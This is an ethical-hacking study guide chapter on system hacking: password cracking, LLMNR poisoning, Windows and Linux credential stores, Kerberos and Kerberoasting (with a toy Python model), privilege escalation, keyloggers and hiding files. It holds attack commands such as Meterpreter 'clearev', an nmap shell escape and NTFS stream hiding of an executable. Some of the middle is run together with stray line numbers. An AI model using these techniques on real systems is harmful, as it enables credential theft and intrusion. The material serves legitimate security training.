  In this phase, all serious uncertainties that are associated with the system are assessed and prioritized, and remediation is planned to permanently eliminate system flaws. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets. It determines whether the risk level for a particular asset is high, moderate, or low. Remediation is planned based on the determined risk level. For example, vulnerabilities ranked high-risk are targeted first to decrease the chances of exploitation that would adversely impact the organization.

- **Remediation**

  Remediation is the process of applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the successful implementation of the baseline and assessment steps.

- **Verification**

  In this phase, the security team performs a re-scan of systems to assess if the required remediation is complete and whether the individual fixes have been applied to the impacted assets. This phase provides clear visibility into the firm and allows the security team to check whether all the previous phases have been perfectly employed or not. Verification can be performed by using various means such as ticketing systems, scanners, and reports.

- **Monitor**

  Organizations need to perform regular monitoring to maintain system security. They use tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have evolved. As per security best practices, all phases of vulnerability management must be performed regularly.

-------------------------------------------------------------------------------- /6-System-Hacking.md: --------------------------------------------------------------------------------

# System Hacking

> ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/5-System-Hacking)**

## Goals:
1. **Gaining Access** - Uses information gathered to exploit the system
   - **Password Attacks:**
     - **Non-electronic attacks**
     - **Active online attacks**
     - **Passive online attacks**
     - **Offline attacks**
2. **Escalating Privileges** - Granting the account you've hacked admin rights, or pivoting to an admin account
3. **Executing Applications** - Putting back doors into the system so that you can maintain access
4. **Hiding Files** - Making sure the files you leave behind are not discoverable
5. **Covering Tracks** - Cleaning up everything else (log files, etc.)
    - **`clearev`** - Meterpreter command to clear the Windows event logs (issued inside Metasploit Framework)
    - Clear the MRU list in Windows
    - In Linux, prepend a dot to a file name to hide it from a plain `ls`

## Password Attacks

> ⚡︎ **Check out the practical labs on [Dumping and Cracking SAM hashes [1]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/2-SAM-Hashes.md), [Rainbow Tables Basics [2]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/3-Rainbow-tables.md) and [LLMNR/NBT-NS [3]](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/1-LLMNR-NBT-NS.md).**

### **Non-electronic** - Non-technical attacks.
- Social engineering attacks - most effective.
- Shoulder surfing
- Dumpster diving
- Snooping around
- Guessing

### **Active online** - done by directly communicating with the victim's machine.

- Includes **Dictionary** and **Brute-force attacks**, **hash injections, phishing, Trojans, spyware, keyloggers and password guessing**

- **[LLMNR](https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution) / [NBT-NS](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc958811(v=technet.10)?redirectedfrom=MSDN) Poisoning** - Link-Local Multicast Name Resolution and NetBIOS Name Service are the fallback name-resolution protocols Windows uses when DNS cannot resolve a name (a typo in a share path is enough to trigger them). The queries are sent to the whole segment by multicast/broadcast, so any host can answer; an attacker who answers first "poisons" the lookup and receives the victim's authentication attempt. If NTLM is used, the Net-NTLMv2 challenge/response is captured and can then be cracked offline or relayed to another host.
    - ⚡️ [LLMNR/NBT-NS practical lab](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/1-LLMNR-NBT-NS.md)
    - **LLMNR uses UDP 5355** (multicast to 224.0.0.252)
    - **NBT-NS uses UDP 137** (subnet broadcast)
    - `Responder` is the tool that answers the poisoned LLMNR / NBT-NS / mDNS queries and logs the captured Net-NTLM hashes
    - ![LLMNR spoofing](https://www.verifyit.nl/wp/wp-content/uploads/2016/12/llmnr_poison1.jpg)

- **Keylogging** - process of using a hardware device or software application to capture the keystrokes of a user

- Active online attacks are easier to detect and take longer: every guess reaches the target, where it can be logged and throttled by lockout policies
- **Tools for Active Online Attack:**
    - `Medusa`
    - `Hydra`
    - `NBNSpoof`
    - `Pupy`
    - `Metasploit`
    - `Responder` - **LLMNR and NBT-NS responder**; it answers *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only answers File Server Service requests, which is for **SMB**.
- "net" commands can be combined with a tool such as **NetBIOS Auditing Tool** or **Legion** to automate the testing of user IDs and passwords
    - **Tools for NetBIOS attack:**
        - `Hydra`
        - `Metasploit`

### **Passive online** - **Sniffing** the wire in hopes of **intercepting** a password in clear text, or attempting a replay attack or man-in-the-middle attack

- **Tools for Passive Online Attack:**
    - `Cain and Abel` - Can poison ARP and then monitor the victim's traffic; also cracks password hashes (LM, NTLM), sniffs network packets for passwords, recovers locally stored passwords, etc.
    - `Ettercap` - MITM tool for LANs and DNS spoofer; intercepts the traffic on a network segment, captures passwords, and conducts active eavesdropping against a number of common protocols. Its SSL interception works by presenting its own certificate, so it only yields plaintext when the victim clicks through the certificate warning.
    - `KerbCrack` - built-in sniffer and password cracker looking for port 88 Kerberos traffic
    - `ScoopLM` - specifically looks for Windows authentication traffic on the wire and has a password cracker

> ⚠️ **Services/Protocols that use clear text** (credentials can be read straight off the wire):

Service | Port
-|-
FTP | 20/21
TELNET | 23
SMTP | 25
HTTP | 80
POP3 | 110
IMAPv4 | 143
NetBIOS / SMB | 139, 445
SNMP (v1/v2c community strings) | 161, 162
SQL*Net | 1521

### **Offline** - when the hacker steals a copy of the password file (plaintext or hashes) and does the cracking on a separate system, where no lockout policy or logging gets in the way.

- **Dictionary Attack** - uses a word list to attack the password. Fastest method of attacking, but it only finds passwords that are in the list.

    - **Wordlists** - A wordlist or password dictionary is a collection of passwords stored in plain text; basically a text file with a bunch of passwords in it. One popular example is **[rockyou.txt](https://www.kaggle.com/wjburns/common-password-list-rockyoutxt)**, containing 14,341,564 unique passwords.

    - You can also generate your own wordlist with given parameters like length, combining letters and numbers, profiling etc.
    - Tools for generating wordlists:
        - `CeWL` (spiders a target website and builds a list from the words found there)
        - `crunch` (generates every combination for a given character set and length)

- **Brute force attack** - Tries every combination of characters to crack a password

    - Can be faster if you know parameters (such as at least 7 characters, must have a special character, etc.), because they shrink the keyspace

- **Hybrid attack** - Takes a dictionary attack and replaces characters (such as a 0 for an o) or adds numbers to the end

- **Rainbow tables** - Uses pre-computed hash chains to look up a password from its hash. Faster because the hashes are already computed; defeated by salting, which is why rainbow tables still work against unsalted LM/NT hashes but not against `/etc/shadow`.

- **Tools for cracking password files (CLI):**
    - `John the Ripper` - Runs on Unix and Windows; cracks Unix crypt, Windows LM/NT, Kerberos, MySQL, LDAP, MD4 and many other hash formats.
    - [`Hashcat`](https://hashcat.net/wiki/doku.php?id=hashcat) - Advanced GPU password recovery tool; supports hundreds of hash modes for operating systems, documents, password managers and more (MD5, SHA family, RIPEMD, NTLM, LM, Net-NTLMv2, BitLocker, macOS, salted or iterated MD5, and the list goes on).
    - ![hashcat](https://hashcat.net/hashcat/hashcat.png)
- **Tools for cracking password files (GUI):**
    - `Cain & Abel` - Windows software; cracks password hashes (LM, NTLM), sniffs network packets for passwords, recovers locally stored passwords, etc.
    - `L0phtCrack` - Paid software; extracts and cracks hashes using brute force or dictionary attacks.
    - `Ophcrack` - Free and open source; cracks Windows log-in passwords from LM/NT hashes using rainbow tables.
    - `RainbowCrack` - Rainbow table generator and cracker.
    - `Legion` - Automates password guessing in NetBIOS sessions. Legion scans multiple IP address ranges for Windows shares and also offers a manual dictionary attack tool.
    - `KerbCrack` - Cracks Kerberos passwords.
    - `Mimikatz` - Steals credentials from memory and escalates privileges (Windows NT hashes and Kerberos tickets, Golden Ticket attack; 'Pass-the-Hash' and 'Pass-the-Ticket').
    - `fgdump` - Dumps the SAM database on Windows machines.
    - `Pwdump7` - Dumps the SAM database on Windows machines.

- **CHNTPW** - chntpw is a utility for **resetting** or **blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8, 8.1 and 10**. It does this by editing the SAM database where Windows stores password hashes, so it needs the disk offline; it requires no knowledge of the password but is not stealthy, since the user's old password stops working.
    1. **Physical access** to the victim's computer
    2. Boot from CD or USB (enable it in the BIOS/UEFI settings if needed)
    3. Modify the SAM user account information with chntpw

> ⚠️ `rtgen`, `winrtgen` - Tools to generate your own rainbow tables.
> ⚠️ **SAM (Security Account Manager)** is a database file **present in Windows machines that stores user accounts and security descriptors for users on a local computer**. It stores user passwords in hashed form (LM hash and NT hash). Because a hash function is one-way, this provides some measure of security for the stored passwords, but NT hashes are unsalted and fast to compute, so a dumped SAM is cracked offline with wordlists or rainbow tables, or the hash is used as-is in Pass-the-Hash.

> ⚠️ **`/etc/shadow`** is where **hashed password data** is stored on **Linux systems** (only root can read it; `/etc/passwd` is world-readable but holds no hashes).

> ⚠️ **Password attack countermeasures:**
> - **Length of passwords** is good against **brute-force attacks.**
> - **Password complexity** is good against **dictionary attacks.**
> - Account lockout and rate limiting defeat online guessing; salting and slow hashes (bcrypt, scrypt, Argon2, sha512crypt) slow down offline cracking.

## Authentication

- **Three Different Types**
    - **Something You Are** - Uses biometrics to validate identity (retina, fingerprint, etc.)
        - Downsides are false rejections of legitimate users, and that a biometric cannot be changed once it leaks

        - **False acceptance rate (FAR) - Type II error** - Likelihood that an unauthorized user will be accepted (the dangerous one)
        - **False rejection rate (FRR) - Type I error** - Likelihood that an authorized user will be rejected
        - **Crossover error rate (CER)** - The point where FAR and FRR are equal; the lower the CER, the better the system
        - **Active** - requires interaction (retina scan or fingerprint scanner)
        - **Passive** - Requires no interaction (iris scan)
    - **Something You Have** - Usually consists of a token of some kind (swipe badge, ATM card, etc.)
        - This type usually requires something alongside it (such as a PIN for an ATM card)
        - Some tokens are single-factor (such as a plug-and-play authentication)
    - **Something You Know** - Better known as a password
        - Most systems use this because it is universal and well-known

- **Two-Factor** - When you combine two different types of authentication, such as something you know (password) and something you have (access card); two passwords are still a single factor

- **Strength of passwords** - Determined by length and complexity
    - ECC says that both should be combined for the best outcome
    - Complexity is defined by the number of character sets used (lower case, upper case, numbers, symbols, etc.)
    - **Default passwords** - should always be changed and never left as shipped. Sites such as cirt.net, default-password.info and open-sez.me keep databases of them

# Windows Security Architecture

- Authentication credentials are stored in the SAM file
    - File is located at `C:\Windows\System32\config\SAM` (locked while Windows runs; it is dumped from the registry hive in memory, a volume shadow copy or an offline disk)
    - Older systems use LM hashing. Current systems store the **NT hash** (MD4 of the UTF-16LE password, unsalted) and authenticate over the network with **NTLMv2**, an HMAC-MD5 challenge/response keyed from that hash. The stored hash is what the dumping tools above extract and what Pass-the-Hash reuses.
    - Windows domain network authentication uses Kerberos; NTLM remains as the fallback

### **LM Hashing**
- Pads the password to 14 characters, upper-cases it and splits it into two 7-character halves; each half is used as a DES key to encrypt a fixed string, so the two halves can be attacked independently.
- If one half is blank (password of 7 characters or fewer), that half's hash is the constant `AAD3B435B51404EE`
- Easy to break because each half is at most 7 upper-case characters, there is no salt, and the two halves are cracked separately
- pwdump/SAM dump format: `UserName:RID:LM_Hash:NT_Hash:::` (the LM field reads `aad3b435b51404eeaad3b435b51404ee` when LM hash storage is disabled, the default since Windows Vista)

### **Ntds.dit**
Database file on a domain controller that stores the domain's password hashes
- Located at `%SystemRoot%\NTDS\Ntds.dit` (default) or
- `%SystemRoot%\System32\Ntds.dit`
- Includes the entire Active Directory; the hashes inside are encrypted with the boot key from the SYSTEM hive, so both files are needed to extract them

### **Kerberos** for Active Directory Domain Services (AD DS)


![kerberos](https://www.manageengine.com/products/active-directory-audit/kb/images/event-4771-kerberos-authentication-illustration.jpg)

- Steps of exchange
    1. Client asks the **Key Distribution Center** (KDC) for a ticket (AS-REQ). With pre-authentication the request carries a timestamp encrypted with the user's key; without it, anyone can request the reply (AS-REP roasting).
    2. KDC responds with a **Ticket Granting Ticket** (TGT) (AS-REP). The TGT is encrypted with the krbtgt account's key and is opaque to the client; next to it comes a session key encrypted with the user's key, which is derived from the user's password.
    3. If the client can decrypt the session key (i.e., it knows the password), it sends the TGT back to the KDC together with an authenticator, requesting a service ticket from the **Ticket Granting Service** (TGS) (TGS-REQ).
    4. KDC returns the service ticket (TGS-REP), encrypted with the target service account's key, which the client presents to the service. Because that ticket is encrypted with a key derived from the service account's password, any domain user can request one and crack it offline (Kerberoasting).
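The four steps above as runnable code, an added model that is not from the original notes and not a real Kerberos implementation: a toy authenticated cipher (`seal`/`unseal`) stands in for the Kerberos encryption types and `derive_key` stands in for string-to-key, both assumptions made for illustration. It shows the part practitioners most often misread: the TGT is encrypted with the krbtgt key and is opaque to the client; what the client must decrypt with its password-derived key is the session key beside it, and the service ticket is encrypted with the service account's key, which is why it can be cracked offline. Principal names and passwords are constructed.

```python
import hashlib
import hmac
import json
import os
import time
from typing import Iterable, Optional, Tuple


def derive_key(password: str) -> bytes:
    """Stand-in for Kerberos string-to-key (AD really uses the NT hash for RC4-HMAC, PBKDF2 for AES)."""
    return hashlib.sha256(password.encode("utf-16le")).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(length // 32 + 1))[:length]


def seal(key: bytes, obj: dict) -> bytes:
    """Toy encrypt-then-MAC (SHA-256 keystream + HMAC-SHA256). Illustration only, not a real Kerberos etype."""
    nonce = os.urandom(16)
    pt = json.dumps(obj).encode()
    ct = bytes(p ^ k for p, k in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()


def unseal(key: bytes, blob: bytes) -> Optional[dict]:
    """Returns None on a wrong key, just as a client with the wrong password cannot use its AS-REP."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        return None
    return json.loads(bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct)))))


class KDC:
    """AS and TGS halves of the KDC: one key per principal, plus the krbtgt key that nobody else holds."""

    def __init__(self, principals: dict):
        self.keys = {name: derive_key(pw) for name, pw in principals.items()}
        self.keys["krbtgt"] = os.urandom(32)

    def as_exchange(self, user: str) -> Tuple[bytes, bytes]:
        # Step 2 (AS-REP): session key sealed under the USER's key; TGT sealed under the KRBTGT key.
        # Real AD checks a pre-auth timestamp first; without pre-auth this reply is AS-REP-roastable.
        sk = os.urandom(32)
        tgt = seal(self.keys["krbtgt"], {"user": user, "sk": sk.hex(), "exp": time.time() + 10 * 3600})
        return seal(self.keys[user], {"sk": sk.hex()}), tgt

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str) -> Optional[bytes]:
        # Steps 3-4: open the TGT with our own key, verify the authenticator with the session key inside it,
        # then issue a service ticket sealed under the SERVICE account's key.
        inner = unseal(self.keys["krbtgt"], tgt)
        if inner is None or time.time() > inner["exp"]:
            return None
        auth = unseal(bytes.fromhex(inner["sk"]), authenticator)
        if auth is None or auth["user"] != inner["user"]:
            return None
        return seal(self.keys[service], {"user": inner["user"], "service": service})


def client_login(kdc: KDC, user: str, password: str, service: str) -> Optional[bytes]:
    """Client side of steps 1-4: only the right password recovers the session key, so only then is a ticket issued."""
    enc_part, tgt = kdc.as_exchange(user)
    part = unseal(derive_key(password), enc_part)
    if part is None:
        return None              # wrong password: the TGT we hold is useless without the session key
    sk = bytes.fromhex(part["sk"])
    authenticator = seal(sk, {"user": user, "ts": time.time()})
    return kdc.tgs_exchange(tgt, authenticator, service)


def kerberoast(service_ticket: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """The service ticket is sealed under a key derived from the service account's password,
    so any domain user can request one and guess that password offline."""
    for cand in wordlist:
        if unseal(derive_key(cand), service_ticket) is not None:
            return cand
    return None
```

Golden Ticket attacks follow from the same structure: whoever holds the krbtgt key can `seal` a TGT for any user with any expiry, and the KDC will accept it in `tgs_exchange` without ever having seen an AS exchange.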
181 | - **Tools** 182 | - KerbSniff 183 | - KerbCrack 184 | - Both take a long time to crack 185 | 186 | > ⚠️ **Uses TCP/UDP Port 88** 187 | 188 | ### **Registry** 189 | ![registry](https://upload.wikimedia.org/wikipedia/en/5/52/Regstry_Editor.png) 190 | - Collection of all settings and configurations that make the system run 191 | - Made up of keys and values 192 | - Root level keys 193 | - **HKEY_LOCAL_MACHINE** (HKLM) - information on hardware and software 194 | - **HKEY_CLASSES_ROOT** (HKCR) - information on file associates and OLE classes 195 | - **HKEY_CURRENT_USER** (HKCU) - profile information for the current user including preferences 196 | - **HKEY_USERS** (HKU) - specific user configuration information for all currently active users 197 | - **HKEY_CURRENT_CONFIG** (HKCC) - pointer to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current 198 | - Type of values 199 | - **REG_SZ** - character string 200 | - **REG_EXPAND_SZ** - expandable string value 201 | - **REG_BINARY** - a binary value 202 | - **REG_DWORD** - 32-bit unsigned integer 203 | - **REG_LINK** - symbolic link to another key 204 | - Important Locations 205 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 206 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 207 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 208 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 209 | - Executables to edit 210 | - regedit.exe 211 | - regedt32.exe (preferred by Microsoft) 212 | ### **MMC** 213 | ![mmc](https://upload.wikimedia.org/wikipedia/en/b/b7/Microsoft_Management_Console_-_Device_Manager.png) 214 | 215 | - Microsoft Management Console - used by Windows to administer system 216 | 217 | - Has "snap-ins" that allow you to modify sets (such as Group Policy Editor) 218 | 219 | ### **Sigverif.exe** 220 | - 
![sigverif](https://cdn.ghacks.net/wp-content/uploads/2015/04/sigverif-file-signature-verification.jpg) 221 | - File Signature Verification (Sigverif.exe) detects signed files and allows you to: 222 | - View the certificates of signed files to verify that the file has not been tampered with after being certified. 223 | - Search for signed files. 224 | - Search for unsigned files. 225 | 226 | # Linux Security Architecture 227 | 228 | ### Linux Directory Structure 229 | - Linux root is just a slash (/) 230 | - Important locations 231 | - **/** - root directory 232 | - **/bin** - basic Linux commands 233 | - **/dev** - contains pointer locations to various storage and input/output systems 234 | - **/etc** - all administration files and passwords. Both password and shadow files are here 235 | - **/home** - holds the user home directories 236 | - **/mnt** - holds the access locations you've mounted 237 | - **/sbin** - system binaries folder which holds more administrative commands 238 | - **/usr** - holds almost all of the information, commands and files unique to the users 239 | 240 | ![linux-architecture](https://www.tecmint.com/wp-content/uploads/2013/09/Linux-Directory-Structure.jpeg) 241 | 242 | 243 | ### Linux Common Commands 244 | 245 | | Command | Description | 246 | | :--------: | ------------------------------------------------------------ | 247 | | `adduser` | Adds a user to the system | 248 | | `cat` | Displays contents of file | 249 | | `cp ` | Copies | 250 | | `ifconfig` | Displays network configuration information | 251 | | `kill ` | Kills a running process | 252 | | `ls ` | Displays the contents of a folder. `-l` option provides most information. | 253 | | `man ` | Displays the manual page for a command | 254 | | `passwd ` | Used to change password | 255 | | `ps ` | Process status. `-ef` option shows all processes | 256 | | `rm ` | Removes files. 
`-r` option recursively removes all directories and subdirectories |
| `su ` | Allows you to perform functions as another user (super user) |

- Adding an ampersand after a process name indicates it should run in the background.
- **`pwd`** - displays the current directory
- **`chmod`** - changes the permissions of a folder or file
    - **Read is 4, write is 2 and execute is 1**
    - Read | Write | Execute
      :--:|:--:|:--:
      r-- | -w- | --x
      4 | 2 | 1
    - First number is user (owner), second is group, third is others
    - `ls -la` shows the permission string. A file open to everyone (777) is listed as `rwxrwxrwx`:
        - rwx ---> user
        - rwx ---> group
        - rwx ---> others
    - Another example - **755** is **everything for the user**, **read/execute for group**, and **read/execute for others**, listed as `rwxr-xr-x`:
        - rwx ---> user
        - r-x ---> group
        - r-x ---> others
    - You can also set permissions symbolically: `chmod g=rw file` (set read/write for group).
    - An `s` in the owner's execute position (`rwsr-xr-x`, octal 4755) is the SUID bit: the file runs with its owner's privileges, which is why SUID root binaries are the first thing to enumerate for privilege escalation.
- **Root has UID and GID of 0** - *you can see this by issuing the command `id`.*
    `root@kali:~# id`
    - ```
      uid=0(root) gid=0(root) groups=0(root)
      ```

- The first user has UID and GID 500 on older Fedora and CentOS releases; on most Linux systems the **first non-root/normal user has UID and GID 1000.**

    - `normal-user@kali:~$ id`
    - ```
      uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),132(scanner)
      ```

- Passwords are stored in **/etc/shadow** on most current systems
    - **/etc/passwd** is world-readable and lists the accounts (name, UID, GID, home, shell); its password field holds only an `x` placeholder, the hash itself lives in `/etc/shadow`.
    - `cat /etc/passwd`
    - ```
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      sys:x:3:3:sys:/dev:/usr/sbin/nologin
      sync:x:4:65534:sync:/bin:/bin/sync
      (...)
      ```
    - **/etc/shadow** stores the password hashes (salted; `$6$` is sha512crypt, `$1$` MD5-crypt, `$y$` yescrypt) and is only readable by root. A `!` or `*` in the hash field means the account is locked or has no password login.

    - `sudo cat /etc/shadow`
    - ```
      root:!:18390:0:99999:7:::
      daemon:*:18390:0:99999:7:::
      bin:*:18390:0:99999:7:::
      kali:$6$a/53BntOdPOaghAx$VCAdR3Af97cYTtWCtDp9iksacL3gj2Sgrb12EMix0ITuxc5jOQp1lbaRi.jNDsP2qjV3GvFAqd5Fu.8/7/P1.:18281:0:99999:7:::
      (...)
      ```
## Privilege Escalation and Executing Applications

> ⚡︎ **Check out the [practical lab on PrivEsc](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/5-Escalating-Privileges.md)**

### **Vertical** - A lower-privileged user executes code at a higher privilege level *(e.g.: common user to root/administrator).*
### **Horizontal** - Executing code at the same privilege level but as a different user, reaching data or functions that should be protected from that access (e.g. reading another user's files)


- Cracking the password of an admin - primary aim
- Taking advantage of an OS vulnerability
    - One way to perform a privesc is to run a public CVE exploit from whatever foothold you already have (local shell, web shell, etc.).
    - Examples:
        - Linux: [DirtyCow](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195) race-condition vulnerability in the kernel's copy-on-write handling; a local user can write to read-only files such as `/etc/passwd` and become root;
        - Windows: [EternalBlue](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0144) exploits a flaw in Microsoft's SMBv1 server (MS17-010) for unauthenticated remote code execution as SYSTEM; it is an initial-access exploit that lands with full privileges rather than a local escalation;

- **DLL Hijacking** - placing your own DLL where a privileged application will load it (a missing DLL or a writable directory earlier in the search order) so your code runs with that application's privileges
- On Linux machines, look at **crontabs** for jobs run by root that execute scripts or binaries you can write to.
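Checks for the two things just covered, permission bits and the `/etc/passwd` / `/etc/shadow` pair, as an added example that is not from the original notes: it converts `ls -l` mode strings to octal including the SUID/SGID/sticky bits, flags SUID-root binaries and world-writable files in a listing (the cron script case from the privesc list above), and flags a second UID 0 account and an empty shadow password field. The listing, passwd and shadow lines are constructed samples.

```python
from typing import List, Tuple

# Constructed samples (not from a real host)
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup2:x:0:0:leftover:/root:/bin/bash
kali:x:1000:1000:kali,,,:/home/kali:/bin/bash
"""
SHADOW = """\
root:!:18390:0:99999:7:::
daemon:*:18390:0:99999:7:::
backup2::18390:0:99999:7:::
kali:$6$a/53BntOdPOaghAx$VCAdR3Af97cYTtWCtDp9iksacL3gj2Sgrb12EMix0ITuxc5jOQp1lbaRi.jNDsP2qjV3GvFAqd5Fu.8/7/P1.:18281:0:99999:7:::
"""
LS_OUTPUT = """\
-rwsr-xr-x 1 root root 68208 /usr/bin/passwd
-rwsr-xr-x 1 root root 2.9M /usr/bin/nmap
-rw-r--r-- 1 root root 1024 /etc/passwd
-rw-r----- 1 root shadow 900 /etc/shadow
-rwxrwxrwx 1 root root 200 /etc/cron.hourly/backup.sh
"""


def mode_to_octal(mode: str) -> int:
    """'rwsr-xr-x' -> 0o4755. An upper-case S/T means the special bit is set without the execute bit."""
    special, perm = 0, 0
    for i, ch in enumerate(mode[:9]):
        if ch == "-":
            continue
        bit = 1 << (8 - i)                     # r/w/x position -> octal bit
        if ch in "rwx":
            perm |= bit
        elif ch in "sS":                        # owner position 2 = SUID, group position 5 = SGID
            special |= 0o4000 if i == 2 else 0o2000
            if ch == "s":
                perm |= bit
        elif ch in "tT":                        # sticky bit in the others' execute position
            special |= 0o1000
            if ch == "t":
                perm |= bit
    return special | perm


def audit_listing(listing: str) -> List[Tuple[str, str]]:
    """Flag what a privesc enumeration looks for first: SUID-root binaries and world-writable files."""
    findings = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        mode, owner, path = parts[0][1:10], parts[2], parts[-1]
        octal = mode_to_octal(mode)
        if octal & 0o4000 and owner == "root":
            findings.append((path, "SUID root binary"))
        if octal & 0o002:
            findings.append((path, "world-writable"))
    return findings


def audit_accounts(passwd: str, shadow: str) -> List[Tuple[str, str]]:
    """Flag backdoor-style account states: extra UID 0 users, hashes in passwd, empty or weak shadow hashes."""
    findings = []
    for line in passwd.splitlines():
        name, pw, uid, _gid, _gecos, _home, _shell = line.split(":")
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if pw not in ("x", "*"):
            findings.append((name, "hash stored in world-readable /etc/passwd"))
    for line in shadow.splitlines():
        name, hashed = line.split(":")[:2]
        if hashed == "":
            findings.append((name, "empty password field: login without password"))
        elif hashed.startswith("$1$"):
            findings.append((name, "MD5-crypt hash: fast to attack offline"))
    return findings


if __name__ == "__main__":
    for item in audit_listing(LS_OUTPUT) + audit_accounts(PASSWD, SHADOW):
        print(*item, sep="\t")
```

On a live box the same two checks are `find / -perm -4000 -type f` / `find / -perm -o+w -type f` and a comparison of `awk -F: '$3==0' /etc/passwd` against the expected single `root` line.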
- In Linux, **insecure `sudo`** rules can lead to privilege escalation to root; check with `sudo -l`. Any command allowed with the **NOPASSWD** option, or any allowed command that can spawn a shell or write arbitrary files (editors, `find`, pagers, interpreters), may lead to escalation.
- Old Nmap versions have an **interactive mode** (`nmap --interactive`) from which `!/bin/bash` spawns a shell; if nmap is SUID root or allowed through sudo, that shell runs as root.
- Use a tool that will provide you the access, such as Metasploit
- Social engineering a user to run an application
- ECC refers to executing applications as "owning" a system
- **Executing applications** - starting things such as keyloggers, spyware, back doors and crackers

## Covert data gathering
### **Keyloggers** - record the keystrokes of an individual computer keyboard or a network of computers.

- A keylogger combined with spyware helps transmit the captured information to an unknown third party.

- **Types of Keyloggers**:
    - **Hardware keylogger**
        - PC/BIOS embedded
        - Keyboard
        - External device
            - PS/2 and USB
            - Acoustic/CAM
            - Bluetooth
            - Wi-Fi
        - **Hardware Keylogger Tools:**
            - KeyGrabber - electronic device capable of capturing keystrokes from a PS/2 or USB keyboard.
            - KeyCarbon, Keyllama, KeyGhost - in-line PS/2 or USB devices of the same kind; they sit between keyboard and host, so no software on the host can see them.

    - **Software keylogger**
        - Application
        - Kernel
        - Hypervisor-based
        - Form Grabbing based (records data from web forms before it is encrypted)
        - **Software Keylogger Tools:**
            - Keyboard logger



### **Spyware** - watches a user's actions and logs them without the user's knowledge.
- Hides its processes, files and other objects
- **Spyware can steal a user's PII, monitor activity, display annoying pop-ups, redirect web pages to ads, change the browser's settings, steal passwords, modify DLLs, change firewall settings and so on**.
- **Types of spyware:**
    - Desktop
    - Email
    - Internet
    - Child-Monitoring
    - Screen Capturing
    - USB
    - Audio and Video
    - Printers
    - Mobile devices / Telephones / Cellphones
    - GPS
- **Spyware Tools**:
    - [SpyAgent](https://www.spytech-web.com/) - commercial monitoring software that secretly records all activity on a computer; it is sold for "legal" monitoring, but the technique is the same as malicious spyware.
    - [Power Spy](http://ematrixsoft.com/power-spy-software.php) - same class of commercial activity recorder.
    - **mSpy** - mobile spyware that traces the GPS location of a particular device.
    - **USBDeview** - lists and monitors the USB devices that have been connected to a computer (a NirSoft utility, useful for seeing what was plugged in).

### Defending against Keyloggers and Spyware
- Restrict physical access to computer systems
- Use an anti-keylogger that sits between the keyboard and its driver
- Use a pop-up blocker and avoid opening junk emails
- Use anti-spyware/antivirus
- Firewall and anti-keylogging software (Zemana AntiLogger)
- Update and patch!
- Recognize phishing emails
- Host-based IDS
- Automatic form-filling password manager or virtual keyboard

## Hiding Files

> ⚡︎ **Check out the practical labs(2) on [Hiding Files using NTFS streams](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/8-NTFS-Streams.md) and [Steganography](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/9-Steganography.md)**

- In Windows, you can use **Alternate Data Streams** (ADS) to hide files:
    - An ADS is a second, named stream attached to an NTFS file; it does not appear in a normal directory listing and does not change the host file's reported size
    - `type badfile.exe > plaintext.txt:badfile.exe` (`plaintext.txt` still opens with its original content)
    - To run it, create a symlink to the stream: `mklink normalApp.exe plaintext.txt:badfile.exe`
    - Streams are lost when the file is copied to a FAT partition (or through any tool that is not NTFS-aware), which is also how you strip them
    - To show ADS, `dir /r` does the trick;
    - You can use `streams` from **Sysinternals** to list streams (and `streams -d` to delete them).
    - Also you can use **FTK (Forensics ToolKit)** to look for this
- **You can also hide files by attributes**
    - In Windows: `attrib +h filename` (`dir /a` still shows it)
    - In Linux, simply add a `.` to the beginning of the filename (`.file.tar`); `ls -a` still shows it
- **Can hide data and files with steganography**
    - Tools for steganography:
        - CLI (Linux):
            - **`steghide`**
        - GUI (Windows):
            - **Snow**
            - **OpenStego**
            - **OpenPuff**

> ### ⚠️ Steganography:

